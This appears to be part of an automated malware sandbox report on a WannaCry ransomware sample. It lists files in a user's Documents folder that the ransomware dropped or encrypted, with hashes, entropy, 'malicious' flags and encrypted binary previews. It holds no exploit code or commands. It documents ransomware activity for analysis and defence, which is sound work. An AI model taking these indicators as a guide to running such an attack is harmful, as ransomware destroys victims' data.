                                                  Preview:WANACRY!....v..%..V.P.r.J..u...?......;P.."J...-...y>...?.h.9..,...4s%...^F........=..I.X.5...-....K...|f....[..a...%.."o.%.YX[@b..C=..kE.e...GT.....%`.5BfK..JI..?..#{n*^.vJ.R.Wg.a/...G^.-.J9....<.....o...g......el?....q...Z/9.....;Iu...........#b.8..#:S.!X............!.X,\......r]..&m.....:+.S......dF.Z..Wr......c.....#ELuQ.aE..;.P..].C....k1$.?...U....L;:z..O. Y.:I*<..W...z.........}.....].5...4...F<.....G.T.....[..,.X..`.s.n..ja..2.y>........DNf/....^.tI..~y....#......eV..r..........=..`......bOl.........C..i@..j6....g....{..v..R.L09@WVc8W|......Z....f.....X...D..|..F..:u/......J.}m...mU.k.....-.....II.=.Zj...u|.F.(hPN...`.,.CS..2 ...r'.A!X..P.8...b.;.1(..-...kc..>..u..OMXK8....f...8K@..1..Y...D..$.GU.....UYn.......%.|.?.*#.V.r........Y/_..J..m..P]..&^..P...</.a..Sz...>....e..J...... .....T..._..7U.4....#y...0..A=Sq=!w.=g...($Ja.d]..b}J.t......2.p/. .s+........?..H...h.=......v.M)j<1...Q......1....Z.b*.....P....R.Z'E9......;.E.L.ve(.P..LV

                                                  C:\Users\user\Documents\PIVFAGEAAV.jpg

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.817309017875281
                                                  Encrypted:false
                                                  SSDEEP:12:unTDxuxcVLjoc/zyMdas8sxKO8SqihCkaV2HMArn4Ghz0SBBJQrpsYFIb2QDSbwp:unTD+cVY8vFlZ+/mrfbJcps/rDSwCW8G
                                                  MD5:AAFF507717F37754B32D6375B30F457C
                                                  SHA1:FAAA50084BEBAA7F0E0A6C85A51A931752A0ED43
                                                  SHA-256:2C0B83179CB7CC7E6785A106AE6B7758085515A82FF8A058CBA16E94174D50EF
                                                  SHA-512:220AA91CC0E8C293081DC7A944991C66718861A81E07A0EE37BA82AE8DB2EF02F4B872805A47D3B90EBE3DC93B8828B4F54EB3103D653DACA76CBA21721F4947
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..^{.}.i.f.H.u>(....&.q.<........X..U.g._.#.........W..T....3.4.^F....v.x.F.2:..?...a.8.....".TM2.:....^...=.w.."...`>............n]=./.jv.........w...&..VG!....HY.....w..g.....i.V.EG.+.A...\.%.U...WIo......%....Z.L.L.%Z....z..V.3.t..x.Ub<.f..S..I`..8.7s.3. .a..'z;..,h.H..1<^....`1....>.=..)n..._.s.....}..w....?...a.$1.S...s...*......M......X.u...0`...e...*zI....;g.58q....<t.......t..y.A.=@...0.... .0.u...]..=..&K..'v..L"...7`O<*.+...@u...u..x..9..%w.[ ..h.f..U$p9...f.z0.|L]0.5\\.0U..Wc..U]G~./O..O...6.9.C.Y.Q+.S...0C..d...g......S.w......O.l.0>K.Y..)..I.)..)...N.@.!..|.h.FD..l..jL.i.m.jT(&.x./g.E...wnr-.......:..P.d..%;....+:.p.|..I*.B,C..%...n7..L.:l6<..U..%2.B.K.4.. H4....I.k...n.,... U].....9.....c.}/...e.......9....\*L.M6...f.....^?....5'.%....d"7..[.cCs7..)...".+..|.6m..{L...|F.n..p..RW.f.L..."/'t.9}'..9......F3...W..q.].XRED.H..K...|.)).YR..>A......h;.].-.2K4.: .3..r.c....Z......,....t.....vA~(%i/^S....f@..^.u...Y.99.f..F..{........w

                                                  C:\Users\user\Documents\PIVFAGEAAV.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8534886434631215
                                                  Encrypted:false
                                                  SSDEEP:24:bkrDR2LUiqPWeFa2HIBQSEtvD5OaAIBzm1k8cEco8YnGSS/J//Nuy4CJO:bkrDEUiqPWma2HIB1O75OcB67S1Uya
                                                  MD5:040359A767D8DC7004235B5EC785CAFE
                                                  SHA1:B5CAD890623BC25394152E4D0DA618BC0B49A9CC
                                                  SHA-256:2FC99E4B8BB11256F257F6A9F040A484AA7D2EAAE4DB06758E963C8E9DDC618E
                                                  SHA-512:B8130BC4B4CD57F72430002DF67D814633EE9053D1809C3B92C510859B18D7C455AA2E4C2E8CB985A1F18BC6D2516E76C4276F3140FB2A41D74D9C7AB0FF8782
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......;_.].......>~XkO..H....u.v.-.....I..l.y.HB)jV=.t./.s;......I.z..iS.....>s........Q"_.....yB.P.3i. I|[.},*!G...z.u....|..,......8..G......t.p..i^N[.X .m^K.LR..M.......k.'..@h4....o...Y.v..%.h.....%n5.wR...s.i.!.....~9.j.e....X..Q.T!..M.|..n............wx.~....?t0..k.^.5..gj!.hh7......G}.Il..`.p..o..$.......'3..i..z.....;.1..r..E<e.2h..8...;]..S.X`L"..W..5.E.x!..).5...."....\N.....En7Fz-..:G2..(......+Vul..t#...9%.&.l |'..D.........hOEK.F=...bI.MR..V.....7.......S:xc.!.H......d9i.i/.-...T.[...#.QJWEp.. ..?..L.J...z..{I.?.M...ubR.<.~..X...O]...........!>.~.,K#8.Z...lA...p..4q....&x.$V>K.z..0.a..^5.w...t..z....x.K....;7}p.w]m..H.....&.yR1.$..E.0.....<.1I.r"....G..yANy\j8@.<%....M.5~.s...(..t.^.M.d........b~....nh8!M6_.3.^B>.T.....E.-d'U$H..O..~k.......kNG..a6CSr......L.W.'.=A.8%"{.UV.iq..X......g...o.w.%..9~F~..":..3.....}.\...\'....S..a.._.....j.f....%.........6..^W.{..3......bC1..&k..Z....z....*../A..k{".:....lC....

                                                  C:\Users\user\Documents\PIVFAGEAAV.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8534886434631215
                                                  Encrypted:false
                                                  SSDEEP:24:bkrDR2LUiqPWeFa2HIBQSEtvD5OaAIBzm1k8cEco8YnGSS/J//Nuy4CJO:bkrDEUiqPWma2HIB1O75OcB67S1Uya
                                                  MD5:040359A767D8DC7004235B5EC785CAFE
                                                  SHA1:B5CAD890623BC25394152E4D0DA618BC0B49A9CC
                                                  SHA-256:2FC99E4B8BB11256F257F6A9F040A484AA7D2EAAE4DB06758E963C8E9DDC618E
                                                  SHA-512:B8130BC4B4CD57F72430002DF67D814633EE9053D1809C3B92C510859B18D7C455AA2E4C2E8CB985A1F18BC6D2516E76C4276F3140FB2A41D74D9C7AB0FF8782
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......;_.].......>~XkO..H....u.v.-.....I..l.y.HB)jV=.t./.s;......I.z..iS.....>s........Q"_.....yB.P.3i. I|[.},*!G...z.u....|..,......8..G......t.p..i^N[.X .m^K.LR..M.......k.'..@h4....o...Y.v..%.h.....%n5.wR...s.i.!.....~9.j.e....X..Q.T!..M.|..n............wx.~....?t0..k.^.5..gj!.hh7......G}.Il..`.p..o..$.......'3..i..z.....;.1..r..E<e.2h..8...;]..S.X`L"..W..5.E.x!..).5...."....\N.....En7Fz-..:G2..(......+Vul..t#...9%.&.l |'..D.........hOEK.F=...bI.MR..V.....7.......S:xc.!.H......d9i.i/.-...T.[...#.QJWEp.. ..?..L.J...z..{I.?.M...ubR.<.~..X...O]...........!>.~.,K#8.Z...lA...p..4q....&x.$V>K.z..0.a..^5.w...t..z....x.K....;7}p.w]m..H.....&.yR1.$..E.0.....<.1I.r"....G..yANy\j8@.<%....M.5~.s...(..t.^.M.d........b~....nh8!M6_.3.^B>.T.....E.-d'U$H..O..~k.......kNG..a6CSr......L.W.'.=A.8%"{.UV.iq..X......g...o.w.%..9~F~..":..3.....}.\...\'....S..a.._.....j.f....%.........6..^W.{..3......bC1..&k..Z....z....*../A..k{".:....lC....

                                                  C:\Users\user\Documents\PWCCAWLGRE.mp3

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.823078078306793
                                                  Encrypted:false
                                                  SSDEEP:24:KSBvVVsR+5TDFTKu8OFRvZck5jVBeP9v7/X7iJrI2C6:KStsRQFWupFL5ytbr2rIw
                                                  MD5:13E240ED48EE8EADC3DF0E9C0C7CA782
                                                  SHA1:9EDC2D6DC811CF20AD4D15E8091641B5B8887239
                                                  SHA-256:545B5F1D22F127D3750CC7E029FFD3C7399621CF541D111644794F855FF5A208
                                                  SHA-512:C9A74CB28F81061E3BC79067CA5147C21CE9D88800C0470126C0A3E5F1794A2F65EDBE5ECA0CF1299DF9A8D393961E9BDF1F534A469070C2B9EF5B2CD0EEAB0E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:2.R.F.s..Y&/.......p-q...\2w..x....H.....e...-..U.a.T.....Z].M^[.M.&..Z;>."........m..*F.......4-...%3....wp.....S.Nj.}..n..k..>.M.L.....2#T.R..M.t.*..K~XF..T.l$...U...!.A...D[,../..A..e2;.....J..da.....L./|...7..^.Jt....OS.X.o^}; g...J,.1L[7.U.Gb.V;..p&..t...au]z5J._w.>..BQ.+...TE...f.5.(....W.4E(E.~80...Y.I..k#.)....<......^5..{|.6.w=Cx..1........2.Yt.......*q.Dx...b.q.)....{#|<..Rhm.9.=..]Q......]L7..z..h..I"lDl......L)t..;.\.:.o./........8..b. ..i.df.'.....%....B.].=....<.Me.D....#....8%&.d\?..s_..m:..2W@.^A.T0..+.......ah..<.g...M....%.sW.6..Z-^V.V......Sy....C..j%...o.....gQ..a.w.........93...;}q...........Ksx.>y...&.\.Tb....m.".d3[.?...vX..P._c.K,F>.{.Y.y.....<..-......8...9.Be`.H...2.O.|.uE.{<c.$..#v.6.....,.{.g..O....x....X.;3../ !...L...d..,.N.B.I..o.*..Cd.......Zs.. .Kk..b.........}....s...!,......x....d.._..2.....p......i.1 ...q....A6.@..\.}....t>h...i}....k.Z.F2.x...A.::6...\.a..^..c.^.}.....eI.5%.9h"X>0`?k/..}......P.....V....QR.

                                                  C:\Users\user\Documents\PWCCAWLGRE.mp3.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.826895294508878
                                                  Encrypted:false
                                                  SSDEEP:24:bkDYlF+TWQfMzu8QPH5fKw4Yn0rjntvhSzMQqd34SrlS:bk0ufUzu5iwn0rrVcAQ034t
                                                  MD5:0823027AB2F9CD0EE78ED709F9C2490E
                                                  SHA1:CED6060626548EA43A9B8BFC6D9E06983BCF1F4C
                                                  SHA-256:03C9C168992D5023FEF6F94E132E89BC90A2D0F77C0E18D0FABAC05356A64F53
                                                  SHA-512:257A1A7CCBBCFC2E83317ECD5C4C9097E961C2EF73345DE7A62D61BA57FC179EDFD99B7F9F18DE3766B4FEB80BE81100FCA5E5C74E9B8E58F8D8B83F2DFB3173
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....A9..?.. ..........W.2.ejD...i..-......M..>K00~.<.{x.....!.u.nW..;^.K.t.7 M........i..d.*...</..r../.P.{d...\".i)Q.p,T..P..fQ.dfb:.CG|~|R..p7.BZ...,m.g@V.....3...l.p)./...2.....HKt..........V....?....3.`r.....k"G.[B.q.EQ..RO...:/a.-._...z...t.............B.......c.h..2...?...(..r..2HHY..`.g.M...h.#:...l..V...R.|...&...{.G..........i..I.Q.~>..Y.7P2....z..jw.........\..Lx?.../p.Q.+.-.r.]"...E]....%H....\7#.v.~.2}..C....'...75..-{.F?4V...]...1n.".F...........Hb"...V.*.=`E..w..}.{.@rK...a@*u......^.!.).......x..]...J..s.+....g.(46..<..$...p..S.zy...W..k...U&...&v3..M$...6-%..z.....<.ik..Vl...G.#..3R..Tu.....6......n(.[......n....b.N...b.z........b.....c.....K.........}....$....i....Q.b...j.R..fc_`K...Y]..........oB..*C.....^Oy.E......i|...V.7..W....S}.}S..P..)...R.v.5..lM".LH .1..'.5.i\.p......M.,.n#..1...-....1....$..'...eL.Nn..:.t:..b.})w..d....W.2%..4.PE2..".%.....|2.. .HA.'Q.....R..sy_.....-p......o.h..p..U...1.V....:...=.

                                                  C:\Users\user\Documents\PWCCAWLGRE.mp3.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.826895294508878
                                                  Encrypted:false
                                                  SSDEEP:24:bkDYlF+TWQfMzu8QPH5fKw4Yn0rjntvhSzMQqd34SrlS:bk0ufUzu5iwn0rrVcAQ034t
                                                  MD5:0823027AB2F9CD0EE78ED709F9C2490E
                                                  SHA1:CED6060626548EA43A9B8BFC6D9E06983BCF1F4C
                                                  SHA-256:03C9C168992D5023FEF6F94E132E89BC90A2D0F77C0E18D0FABAC05356A64F53
                                                  SHA-512:257A1A7CCBBCFC2E83317ECD5C4C9097E961C2EF73345DE7A62D61BA57FC179EDFD99B7F9F18DE3766B4FEB80BE81100FCA5E5C74E9B8E58F8D8B83F2DFB3173
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....A9..?.. ..........W.2.ejD...i..-......M..>K00~.<.{x.....!.u.nW..;^.K.t.7 M........i..d.*...</..r../.P.{d...\".i)Q.p,T..P..fQ.dfb:.CG|~|R..p7.BZ...,m.g@V.....3...l.p)./...2.....HKt..........V....?....3.`r.....k"G.[B.q.EQ..RO...:/a.-._...z...t.............B.......c.h..2...?...(..r..2HHY..`.g.M...h.#:...l..V...R.|...&...{.G..........i..I.Q.~>..Y.7P2....z..jw.........\..Lx?.../p.Q.+.-.r.]"...E]....%H....\7#.v.~.2}..C....'...75..-{.F?4V...]...1n.".F...........Hb"...V.*.=`E..w..}.{.@rK...a@*u......^.!.).......x..]...J..s.+....g.(46..<..$...p..S.zy...W..k...U&...&v3..M$...6-%..z.....<.ik..Vl...G.#..3R..Tu.....6......n(.[......n....b.N...b.z........b.....c.....K.........}....$....i....Q.b...j.R..fc_`K...Y]..........oB..*C.....^Oy.E......i|...V.7..W....S}.}S..P..)...R.v.5..lM".LH .1..'.5.i\.p......M.,.n#..1...-....1....$..'...eL.Nn..:.t:..b.})w..d....W.2%..4.PE2..".%.....|2.. .HA.'Q.....R..sy_.....-p......o.h..p..U...1.V....:...=.

                                                  C:\Users\user\Documents\PWCCAWLGRE.pdf

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:COM executable for DOS
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.809328826148128
                                                  Encrypted:false
                                                  SSDEEP:24:TTShNuVorf5jiZR7OP5AjhpYCx/Mss+cjlScLsmW0dZ2U/:TTS/v5c0P5x8/Mf+2FLsmn2U/
                                                  MD5:AC8D1D7E4D7E86AA41125D0573287FE7
                                                  SHA1:06DADB2A070A95FDB5B62233AED37484D5BA2276
                                                  SHA-256:35C072DC1DBEC4FD627D5DCF4676826E81D9A4C0761A8CBBC7A71CDAA09DD175
                                                  SHA-512:4C2A8C4E63518F5F3E6F35C6B7BA0DF2182027B2019E617367C72FF6787EE5580B6558D492143E65B3740286994D4E6BB2FB6D34F979A52B2D83A893A4898869
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:.8....b.Z.t. ..Dd.._..y.|..dw4...W.Dq....!.d.G@..^..,..c...[..rROH{........O.L.u..].2..F.Y?....0.O.....p.#"&y"..E......x..._E.[.uz.B.,.......O.b.@1.H....J..Q........:<z..n...<._0.b{.-..n....1f*.{:.]?H(..<fU..X1.B.bZ..[?.....:.g.H.....e.vl]..X.......hY..>V...n....0M.I.D.8.....;M..).m.D.4.P.v.BAHY..P#.}.Zif.d........=..@...Z.....4>a........)..K...T.at.9J.b^.4..;..d..=m.oHuU...[..0...dTa.GDhr<...*(....q....4.>bW.FcqI......P.......#...Y.a.Z........o..Q...'........q>....f.Y...+..I.$X......K...j,....lF.h.L;..:.S...:......._..T.P.y.YI.......MM.f..`.N.$I,.......u..=..7.......#..9..)..n.M..%....3>g......f.74d.o......a9....}...!A.....F3.c.Mf.?;A.... ...x..4...#3...s....V..S..',.F.....Z.G..#.+Ev!.d2.4.-...=.yw..9\....nq..;.....GiV....M....-k.Q........f{<..(R..`n..u)....b|...yb...u.m%...sN.E..../;9q.av...}z....6S.JfL..y.1R....{......B...^p-k.%^.{q.lR\(Yh.l;.?o6...6..S.tF..!.3w..>...k..'0f M..A.)....w*.tL.7...1.....k...&...!k...;.U.m.UR..B<M..

                                                  C:\Users\user\Documents\PWCCAWLGRE.pdf.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.868364372884899
                                                  Encrypted:false
                                                  SSDEEP:24:bkF2MgQhnFejRmAvznlxrFB759z1pqWaq/Nc84AEpgXUR97a+1X:bkF2MDhsjRmAvrTZz9zTqv844URTX
                                                  MD5:F0B4252CE437F768DF76F64325DFA8AA
                                                  SHA1:4C08C8F9F22192766ABB3DF4FFDA82AA70FB3215
                                                  SHA-256:7A8A387F7EB547C517F6B2C5732015C4EB3057CA84575985901C6D230AB26E71
                                                  SHA-512:3303FC5B48385A04B9B801A1FA2CC7998C567B1418EEC83F0899DE016359994147B5812338FEB21D7171F8C858BF7663983D27029248B0A48B69E47189C71675
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....K..l..&..c=......G...W.).* ....!......q....kL..<..a.........!2./...#A....n..|6...Z9kph`...&..}x.....sQ.>.G......m..2G.".o.....H. ...=..5..kX5Qn. )!.....2.k.&. .@..8..1.%..J...|.0.1+..-.,.[P~...X...Y.g<;hUd..?U..l..R...A.A...at..i#.0z."..N................:pj.......t...<.i...........&2R......J........Jy..9<..C$.`.;.9...b...P....s....y{;.v..(.y..E.N.=...R.._.P6.X.......3........>b.M.y.......|.@!..4..#....R...M.o..k-. b..'... v..R)A*=a#vP.,.8.t:....O..-...V...*.-..o...%.yXb.......!..4...M...S......\............'C..f.c)"......V.cY%z.5.".....HRO.6.. .7....>.....,M'......;&....Q.p&~.4h.d.0Kdol....J..b#...........U....d!..F.~...SVvtN.aE.*].S.......5iI...E..E....%..H.C.....c.E.6.&"t.....}G..9H....Q.....i..?-..L9....W.7X.......j.T...a...Q3O.'i.I.F.......P..q..~........6....%..T...\.%J...`.ME..L..F..9(jxzL...~-...H..O.J..Jy.....V...DG......!.^....).uKI.5r.....b...{...#.\E..#.$.5..>..{1l..a...>...w.U......R...m....b*..vg..@n+J\.1K.

                                                  C:\Users\user\Documents\PWCCAWLGRE.pdf.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.868364372884899
                                                  Encrypted:false
                                                  SSDEEP:24:bkF2MgQhnFejRmAvznlxrFB759z1pqWaq/Nc84AEpgXUR97a+1X:bkF2MDhsjRmAvrTZz9zTqv844URTX
                                                  MD5:F0B4252CE437F768DF76F64325DFA8AA
                                                  SHA1:4C08C8F9F22192766ABB3DF4FFDA82AA70FB3215
                                                  SHA-256:7A8A387F7EB547C517F6B2C5732015C4EB3057CA84575985901C6D230AB26E71
                                                  SHA-512:3303FC5B48385A04B9B801A1FA2CC7998C567B1418EEC83F0899DE016359994147B5812338FEB21D7171F8C858BF7663983D27029248B0A48B69E47189C71675
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....K..l..&..c=......G...W.).* ....!......q....kL..<..a.........!2./...#A....n..|6...Z9kph`...&..}x.....sQ.>.G......m..2G.".o.....H. ...=..5..kX5Qn. )!.....2.k.&. .@..8..1.%..J...|.0.1+..-.,.[P~...X...Y.g<;hUd..?U..l..R...A.A...at..i#.0z."..N................:pj.......t...<.i...........&2R......J........Jy..9<..C$.`.;.9...b...P....s....y{;.v..(.y..E.N.=...R.._.P6.X.......3........>b.M.y.......|.@!..4..#....R...M.o..k-. b..'... v..R)A*=a#vP.,.8.t:....O..-...V...*.-..o...%.yXb.......!..4...M...S......\............'C..f.c)"......V.cY%z.5.".....HRO.6.. .7....>.....,M'......;&....Q.p&~.4h.d.0Kdol....J..b#...........U....d!..F.~...SVvtN.aE.*].S.......5iI...E..E....%..H.C.....c.E.6.&"t.....}G..9H....Q.....i..?-..L9....W.7X.......j.T...a...Q3O.'i.I.F.......P..q..~........6....%..T...\.%J...`.ME..L..F..9(jxzL...~-...H..O.J..Jy.....V...DG......!.^....).uKI.5r.....b...{...#.\E..#.$.5..>..{1l..a...>...w.U......R...m....b*..vg..@n+J\.1K.

                                                  C:\Users\user\Documents\PWCCAWLGRE.xlsx

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.807389885361978
                                                  Encrypted:false
                                                  SSDEEP:24:W2Dt+GAhZyIYfga/zOfaVNGttv9+xRFK+ayt8gAWR9kBS:W2Z/kDarZGttF+xCIt8gOS
                                                  MD5:C151D01D5B70797EEAF7ADB2D34451B2
                                                  SHA1:635ADC1E62F7F9E4FAE2045EFF81D4B40BB46351
                                                  SHA-256:BB5DBC787DC79E82ECA6962157CDC97779CB0B804226FB270056253877327C4E
                                                  SHA-512:0C2F5A4B0CBA4B5445BB24A1B8F9900E1B505513DAB20E3B488CFEFF7887FDF6C40706D3EA8E4E9E4D1CA62A5CB76D6DDEA0F6B244F90252FD93522D98933016
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..._...~Lt....N.k.}.$.H...?+..2..e..?V^......n....4L.........3.:.....E}...$?.0..j.N....&.....p...eE.0.[....?`b....pj.g.>.#...@<.....Jx.rvE..E..$."......C ....[......Z..ej..Vf........(......QR.......48.[.Y.&...\..~.B.m.W.._.$.3j.lT.O..%.T.(l....V....C.....h.Bl.Bf.......(.=.I.R...f)wC...F.)fC.l<....\.}..84..;./>7..5..).Q..w....d..:m...B..?...}....}..55.c.s.T....N.=.7zSnV..]...j...G}...B.`.0.^...*....{t...o.k.V^h...4.o....w..!....vd[.%:0\..i.9/S.n.N]..JvN......@/.8>_cbo..Q...WAR.....J.._...K'....y..g..]xZ..Z...QF..X_..K....c..;...H.'....i./.RU..BD.~#.....q...;xO..hyW.db.:.2..9......)<.C{.K..I....zpR.....p...V_....}.w.."v.tl.Z.HR,...}...2.[.Z4....!.Lf3l.%.(...........c_..........g....5?.+..'.O..2d.&l...Y..f..B..[f`(`.?.....7.S..b........y.>..'..go..;./. .:...g.M.=U.H..#s.]....+..$.p}Q....M9.....v..CD.W..).M.h.....Ld...1..jKV>~M.N.za.%.|.G....#Tk..a.%.Jn.{.|_B...Q.(A#..r..W.Z...R...k.{..i...)l.}Ai......%@.:.|...9..:.'...s.......K.V..7.u|._.50..p..

                                                  C:\Users\user\Documents\PWCCAWLGRE.xlsx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.856249263364781
                                                  Encrypted:false
                                                  SSDEEP:24:bkrNA5xn0LD9jnVss1pQuChCFT7mEl0ABZXbAmdeDmms2q3P:bkrNA5xEhnnrQfMx97rAmdFmQ3P
                                                  MD5:50C43A394C58280EEF8B2EAB3D974834
                                                  SHA1:2BF1642ED063BAF6A8FC3C76763183AB783830A8
                                                  SHA-256:8A3F9067BBAAD482A35C917793DFEB7B1990C800835F334BD9D73A2551282F76
                                                  SHA-512:B49DAE744C4E96A1B304C343ED14E30F6BEE10682D43B67C11EC11B4BD41CF15E0D128A3638A587B7DEC8BF88C1FE38220368DA83BF211DF00DEC94280C17C12
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....0Q..m..r.T.RZ]....6..3)..?).r.z......P`.w...I..7....".O^.".....$...RS..nz.i^..%RAl.D..b.b...W.$..0<80..].XM........v.....}.....k..a..d^v. ......O....A2../..4.AP....-..E..[~..vY.7....*?.0(..g...X...6...g3......../ U.......>.>|.<bGx.%.y...[mG..............(...........0jx1....0....)sS..2...n.?.;.T..AY.L..m}rO|..vS.e3.U...&......2"...z,.B..$..Y.;:.;.d.Q'sC.\f.w..|..[....f.b.g.E4...m....^~.L...3.a.5.....5.K;.iN....a.0.D...."....s..h\.Z.......4@Y..#..Z_,..e.7....$.a...T.W#.2*CYBm....[..c...?ek.v..&.u...Y.i.$..-I.....V*.W......Dw.i..X......B.z. d.X..k................\\.F.`.@S......SU....a.w.o.<$kn,e.@ys.....E..?..}n......e.....,Z...........#..#+.H...DM.PR..a.7.)%....Y...$....!G..1.;M@..k|@....{x....Lulq...o.D..y}...>.$...31......WW...A.%...>y.....V.....Ax..)|V....93.I).5..`Q@...-..f5._.*/...h../$.t..r.](.u.....(.........\.\wZ..`....!..X#..(......6..x.(..-....v.....bh.d_.C..{.V.F.H...=n..1.Q.....Z.9.P.}..}..1...9..s.Hk:x.1..6i.`&.....Z..6.

                                                  C:\Users\user\Documents\PWCCAWLGRE.xlsx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.856249263364781
                                                  Encrypted:false
                                                  SSDEEP:24:bkrNA5xn0LD9jnVss1pQuChCFT7mEl0ABZXbAmdeDmms2q3P:bkrNA5xEhnnrQfMx97rAmdFmQ3P
                                                  MD5:50C43A394C58280EEF8B2EAB3D974834
                                                  SHA1:2BF1642ED063BAF6A8FC3C76763183AB783830A8
                                                  SHA-256:8A3F9067BBAAD482A35C917793DFEB7B1990C800835F334BD9D73A2551282F76
                                                  SHA-512:B49DAE744C4E96A1B304C343ED14E30F6BEE10682D43B67C11EC11B4BD41CF15E0D128A3638A587B7DEC8BF88C1FE38220368DA83BF211DF00DEC94280C17C12
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....0Q..m..r.T.RZ]....6..3)..?).r.z......P`.w...I..7....".O^.".....$...RS..nz.i^..%RAl.D..b.b...W.$..0<80..].XM........v.....}.....k..a..d^v. ......O....A2../..4.AP....-..E..[~..vY.7....*?.0(..g...X...6...g3......../ U.......>.>|.<bGx.%.y...[mG..............(...........0jx1....0....)sS..2...n.?.;.T..AY.L..m}rO|..vS.e3.U...&......2"...z,.B..$..Y.;:.;.d.Q'sC.\f.w..|..[....f.b.g.E4...m....^~.L...3.a.5.....5.K;.iN....a.0.D...."....s..h\.Z.......4@Y..#..Z_,..e.7....$.a...T.W#.2*CYBm....[..c...?ek.v..&.u...Y.i.$..-I.....V*.W......Dw.i..X......B.z. d.X..k................\\.F.`.@S......SU....a.w.o.<$kn,e.@ys.....E..?..}n......e.....,Z...........#..#+.H...DM.PR..a.7.)%....Y...$....!G..1.;M@..k|@....{x....Lulq...o.D..y}...>.$...31......WW...A.%...>y.....V.....Ax..)|V....93.I).5..`Q@...-..f5._.*/...h../$.t..r.](.u.....(.........\.\wZ..`....!..X#..(......6..x.(..-....v.....bh.d_.C..{.V.F.H...=n..1.Q.....Z.9.P.}..}..1...9..s.Hk:x.1..6i.`&.....Z..6.

                                                  C:\Users\user\Documents\QCFWYSKMHA.png

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.813391721287467
                                                  Encrypted:false
                                                  SSDEEP:24:QykbM01mIOBuZhcNuJO2JKaZG9F/T2oVBP3KUrMoMil/PJDUUkSIDlOIpTs:Yf1mIfX8MhKaZ8F7JjXYoFlnJIUbol54
                                                  MD5:4745117616B137D3DA356E97F2756768
                                                  SHA1:1DBC68717E4865DAF037BC78969DACBADCE549D4
                                                  SHA-256:A6FE74920B90F342D706D081BE20A292433DA6BBE35BAE822B18CA80F987C8BE
                                                  SHA-512:AE4CC197DCA9DF9217B23A342C5927BDACA37FF1DD5F670D3375C3615252CC6C8C6B86E69E99DCBC4AE6CF8410D012AD93EA92DC11DA924B21567131FD24D701
                                                  Malicious:false
                                                  Reputation:unknown
